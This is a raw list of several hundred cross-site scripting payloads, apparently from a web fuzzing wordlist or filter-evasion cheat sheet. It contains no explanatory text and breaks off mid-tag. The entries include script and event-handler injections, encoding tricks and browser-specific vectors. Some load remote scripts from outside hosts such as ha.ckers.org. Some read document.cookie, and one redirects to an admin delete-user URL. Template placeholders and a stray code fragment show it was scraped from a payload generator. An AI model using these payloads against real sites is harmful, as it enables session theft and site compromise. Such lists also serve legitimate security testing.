-"`'><script>\xE2\x80\x88javascript:alert(1)</script> -"`'><script>\x00javascript:alert(1)</script> -"`'><script>\xE2\x80\xA8javascript:alert(1)</script> -"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> -"`'><script>\xE1\x9A\x80javascript:alert(1)</script> -"`'><script>\x0Cjavascript:alert(1)</script> -"`'><script>\x2Bjavascript:alert(1)</script> -"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> -"`'><script>-javascript:alert(1)</script> -"`'><script>\x0Ajavascript:alert(1)</script> -"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> -"`'><script>\x7Ejavascript:alert(1)</script> -"`'><script>\xE2\x80\x87javascript:alert(1)</script> -"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> -"`'><script>\xE2\x80\xA9javascript:alert(1)</script> -"`'><script>\xC2\x85javascript:alert(1)</script> -"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> -"`'><script>\xE2\x80\x83javascript:alert(1)</script> -"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> -"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> -"`'><script>\xE2\x80\x80javascript:alert(1)</script> -"`'><script>\x21javascript:alert(1)</script> -"`'><script>\xE2\x80\x82javascript:alert(1)</script> -"`'><script>\xE2\x80\x86javascript:alert(1)</script> -"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> -"`'><script>\x0Bjavascript:alert(1)</script> -"`'><script>\x20javascript:alert(1)</script> -"`'><script>\xC2\xA0javascript:alert(1)</script> -"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> -"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> -"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> -"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> -"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> -"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> -"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> -"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> -"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> -<script\x2F>javascript:alert(1)</script> -<script\x20>javascript:alert(1)</script> -<script\x0D>javascript:alert(1)</script> -<script\x0A>javascript:alert(1)</script> -<script\x0C>javascript:alert(1)</script> -<script\x00>javascript:alert(1)</script> -<script\x09>javascript:alert(1)</script> -`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> -`"'><img src=xxx:x onerror\x00=javascript:alert(1)> -`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> -`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> -`"'><img src=xxx:x onerror\x20=javascript:alert(1)> -`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> -`"'><img src=xxx:x onerror\x09=javascript:alert(1)> -<script>javascript:alert(1)<\x00/script> -<img src=# onerror\x3D"javascript:alert(1)" > -<input onfocus=javascript:alert(1) autofocus> -<input onblur=javascript:alert(1) autofocus><input autofocus> -<video poster=javascript:javascript:alert(1)// -<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> -<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X -<video><source onerror="javascript:javascript:alert(1)"> -<video onerror="javascript:javascript:alert(1)"><source> -<form><button formaction="javascript:javascript:alert(1)">X -<body oninput=javascript:alert(1)><input autofocus> -<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> -<frameset onload=javascript:alert(1)> -<table background="javascript:javascript:alert(1)"> -<!--<img src="--><img src=x onerror=javascript:alert(1)//"> -<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> -<![><img src="]><img src=x onerror=javascript:alert(1)//"> -<style><img src="</style><img src=x onerror=javascript:alert(1)//"> -<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> -<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> -<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> -<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> -<object data="data:text/html;base64,%(base64)s"> -<embed src="data:text/html;base64,%(base64)s"> -<b <script>alert(1)</script>0 -<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> -<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> -<embed src="javascript:alert(1)"> -<img src="javascript:alert(1)"> -<image src="javascript:alert(1)"> -<script src="javascript:alert(1)"> -<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x -<? foo="><script>javascript:alert(1)</script>"> -<! foo="><script>javascript:alert(1)</script>"> -</ foo="><script>javascript:alert(1)</script>"> -<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> -<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> -<% foo><x foo="%><script>javascript:alert(1)</script>"> -<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> -<img \x00src=x onerror="alert(1)"> -<img \x47src=x onerror="javascript:alert(1)"> -<img \x11src=x onerror="javascript:alert(1)"> -<img \x12src=x onerror="javascript:alert(1)"> -<img\x47src=x onerror="javascript:alert(1)"> -<img\x10src=x onerror="javascript:alert(1)"> -<img\x13src=x onerror="javascript:alert(1)"> -<img\x32src=x onerror="javascript:alert(1)"> -<img\x47src=x onerror="javascript:alert(1)"> -<img\x11src=x onerror="javascript:alert(1)"> -<img \x47src=x onerror="javascript:alert(1)"> -<img \x34src=x onerror="javascript:alert(1)"> -<img \x39src=x onerror="javascript:alert(1)"> -<img \x00src=x onerror="javascript:alert(1)"> -<img src\x09=x onerror="javascript:alert(1)"> -<img src\x10=x onerror="javascript:alert(1)"> -<img src\x13=x onerror="javascript:alert(1)"> -<img src\x32=x onerror="javascript:alert(1)"> -<img src\x12=x onerror="javascript:alert(1)"> -<img src\x11=x onerror="javascript:alert(1)"> -<img src\x00=x onerror="javascript:alert(1)"> -<img src\x47=x onerror="javascript:alert(1)"> -<img src=x\x09onerror="javascript:alert(1)"> -<img src=x\x10onerror="javascript:alert(1)"> -<img src=x\x11onerror="javascript:alert(1)"> -<img src=x\x12onerror="javascript:alert(1)"> -<img src=x\x13onerror="javascript:alert(1)"> -<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> -<img src=x onerror=\x09"javascript:alert(1)"> -<img src=x onerror=\x10"javascript:alert(1)"> -<img src=x onerror=\x11"javascript:alert(1)"> -<img src=x onerror=\x12"javascript:alert(1)"> -<img src=x onerror=\x32"javascript:alert(1)"> -<img src=x onerror=\x00"javascript:alert(1)"> -<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> -<img src="x` `<script>javascript:alert(1)</script>"` `> -<img src onerror /" '"= alt=javascript:alert(1)//"> -<title onpropertychange=javascript:alert(1)></title><title title=> -<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> -<!--[if]><script>javascript:alert(1)</script --> -<!--[if<img src=x onerror=javascript:alert(1)//]> --> -<script src="/\%(jscript)s"></script> -<script src="\\%(jscript)s"></script> -<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> -<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X -<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> -<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d -<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> -<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> -<style>*[{}@import'%(css)s?]</style>X -<div style="font-family:'foo&#10;;color:red;';">XXX -<div style="font-family:foo}color=red;">XXX -<// style=x:expression\28javascript:alert(1)\29> -<style>*{x:expression(javascript:alert(1))}</style> -<div style=content:url(%(svg)s)></div> -<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X -<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> -<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X -<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X -<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> -<x style="background:url('x&#1;;color:red;/*')">XXX</x> -<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> -<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> -<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> -<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> -<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi -<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> -<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ -X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > -1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> -1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> -<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> -1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> -<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> -<x style="behavior:url(%(sct)s)"> -<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> -<event-source src="%(event)s" onload="javascript:alert(1)"> -<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> -<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> -<script>%(payload)s</script> -<script src=%(jscript)s></script> -<script language='javascript' src='%(jscript)s'></script> -<script>javascript:alert(1)</script> -<IMG SRC="javascript:javascript:alert(1);"> -<IMG SRC=javascript:javascript:alert(1)> -<IMG SRC=`javascript:javascript:alert(1)`> -<SCRIPT SRC=%(jscript)s?<B> -<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> -<BODY ONLOAD=javascript:alert(1)> -<BODY ONLOAD=javascript:javascript:alert(1)> -<IMG SRC="jav ascript:javascript:alert(1);"> -<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> -<SCRIPT/SRC="%(jscript)s"></SCRIPT> -<<SCRIPT>%(payload)s//<</SCRIPT> -<IMG SRC="javascript:javascript:alert(1)" -<iframe src=%(scriptlet)s < -<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> -<IMG DYNSRC="javascript:javascript:alert(1)"> -<IMG LOWSRC="javascript:javascript:alert(1)"> -<BGSOUND SRC="javascript:javascript:alert(1);"> -<BR SIZE="&{javascript:alert(1)}"> -<LAYER SRC="%(scriptlet)s"></LAYER> -<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> -<STYLE>@import'%(css)s';</STYLE> -<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> -<XSS STYLE="behavior: url(%(htc)s);"> -<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS -<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> -<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> -<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> -<TABLE BACKGROUND="javascript:javascript:alert(1)"> -<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> -<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> -<DIV STYLE="width:expression(javascript:alert(1));"> -<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> -<XSS STYLE="xss:expression(javascript:alert(1))"> -<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> -<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> -<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> -<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> -<BASE HREF="javascript:javascript:alert(1);//"> -<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> -<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> -<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> -<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> -<SCRIPT SRC="%(jpg)s"></SCRIPT> -<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- -<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X -<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> -<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> -<STYLE>@import'%(css)s';</STYLE> -<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> -<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> -<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> -<style onreadystatechange=javascript:javascript:alert(1);></style> -<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> -<embed code=%(scriptlet)s></embed> -<embed code=javascript:javascript:alert(1);></embed> -<embed src=%(jscript)s></embed> -<frameset onload=javascript:javascript:alert(1)></frameset> -<object onerror=javascript:javascript:alert(1)> -<embed type="image" src=%(scriptlet)s></embed> -<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> -<IMG SRC=&{javascript:alert(1);};> -<a href="jav&#65ascript:javascript:alert(1)">test1</a> -<a href="jav&#97ascript:javascript:alert(1)">test1</a> -<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> -<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>"> -';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; -alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- -></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> -'';!--"<XSS>=&{()} -<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> -<IMG SRC="javascript:alert('XSS');"> -<IMG SRC=javascript:alert('XSS')> -<IMG SRC=JaVaScRiPt:alert('XSS')> -<IMG SRC=javascript:alert("XSS")> -<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> -<a onmouseover="alert(document.cookie)">xxs link</a> -<a onmouseover=alert(document.cookie)>xxs link</a> -<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> -<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> -<IMG SRC=# onmouseover="alert('xxs')"> -<IMG SRC= onmouseover="alert('xxs')"> -<IMG onmouseover="alert('xxs')"> -<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> -<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> -<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> -<IMG SRC="jav ascript:alert('XSS');"> -<IMG SRC="jav&#x09;ascript:alert('XSS');"> -<IMG SRC="jav&#x0A;ascript:alert('XSS');"> -<IMG SRC="jav&#x0D;ascript:alert('XSS');"> -perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out -<IMG SRC=" &#14; javascript:alert('XSS');"> -<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> -<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<<SCRIPT>alert("XSS");//<</SCRIPT> -<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > -<SCRIPT SRC=//ha.ckers.org/.j> -<IMG SRC="javascript:alert('XSS')" -<iframe src=http://ha.ckers.org/scriptlet.html < -\";alert('XSS');// -</TITLE><SCRIPT>alert("XSS");</SCRIPT> -<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> -<BODY BACKGROUND="javascript:alert('XSS')"> -<IMG DYNSRC="javascript:alert('XSS')"> -<IMG LOWSRC="javascript:alert('XSS')"> -<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> -<IMG SRC='vbscript:msgbox("XSS")'> -<IMG SRC="livescript:[code]"> -<BODY ONLOAD=alert('XSS')> -xss"><!--><svg/onload=alert(document.domain)> -<BGSOUND SRC="javascript:alert('XSS');"> -<BR SIZE="&{alert('XSS')}"> -<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> -<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> -<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> -<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> -<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> -<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> -<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> -exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> -<STYLE TYPE="text/javascript">alert('XSS');</STYLE> -<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> -<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> -<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> -<XSS STYLE="xss:expression(alert('XSS'))"> -<XSS STYLE="behavior: url(xss.htc);"> -¼script¾alert(¢XSS¢)¼/script¾ -<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> -<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> -<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> -<IFRAME SRC="javascript:alert('XSS');"></IFRAME> -<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> -<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> -<TABLE BACKGROUND="javascript:alert('XSS')"> -<TABLE><TD BACKGROUND="javascript:alert('XSS')"> -<DIV STYLE="background-image: url(javascript:alert('XSS'))"> -<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> -<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> -<DIV STYLE="width: expression(alert('XSS'));"> -<BASE HREF="javascript:alert('XSS');//"> - <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> -<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> -<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> -<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> -<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> -<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> -Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser -<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> - <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- -<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> -<A HREF="http://66.102.7.147/">XSS</A> -<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> -<A HREF="http://1113982867/">XSS</A> -<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> -<A HREF="http://0102.0146.0007.00000223/">XSS</A> -<A HREF="htt p://6 6.000146.0x7.147/">XSS</A> -<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00> -<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' -<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" -<sVg><scRipt %00>alert&lpar;1&rpar; {Opera} -<img/src=`%00` onerror=this.onerror=confirm(1) -<form><isindex formaction="javascript&colon;confirm(1)" -<img src=`%00`&NewLine; onerror=alert(1)&NewLine; -<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> -<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? -<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> -<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ -&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00 -<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> -<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> -<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script -<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} -<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> -<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> -<form><a href="javascript:\u0061lert&#x28;1&#x29;">X -</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> -<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> -<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> -<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a -http://www.google<script .com>alert(document.location)</script -<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a -<img/src=@&#32;&#13; onerror = prompt('&#49;') -<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; -<script ^__^>alert(String.fromCharCode(49))</script ^__^ -</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( -&#00;</form><input type&#61;"date" onfocus="alert(1)"> -<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> -<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ -<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> -<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> -<script ~~~>alert(0%0)</script ~~~> -<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> -<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN -<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) -&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' -&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} -<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ -<div/style="width:expression(confirm(1))">X</div> {IE7} -<iframe/%00/ src=javaSCRIPT&colon;alert(1) -//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// -/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> -//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ -</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> -<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> -</plaintext\></|\><plaintext/onmouseover=prompt(1) -</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} -<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> -<div onmouseover='alert&lpar;1&rpar;'>DIV</div> -<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> -<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> -<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> -<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> -<var onmouseover="prompt(1)">On Mouse Over</var> -<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> -<img src="/" =_=" title="onerror='prompt(1)'"> -<%<!--'%><script>alert(1);</script --> -<script src="data:text/javascript,alert(1)"></script> -<iframe/src \/\/onload = prompt(1) -<iframe/onreadystatechange=alert(1) -<svg/onload=alert(1) -<input value=<><iframe/src=javascript:confirm(1) -<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> -http://www.<script>alert(1)</script .com -<iframe 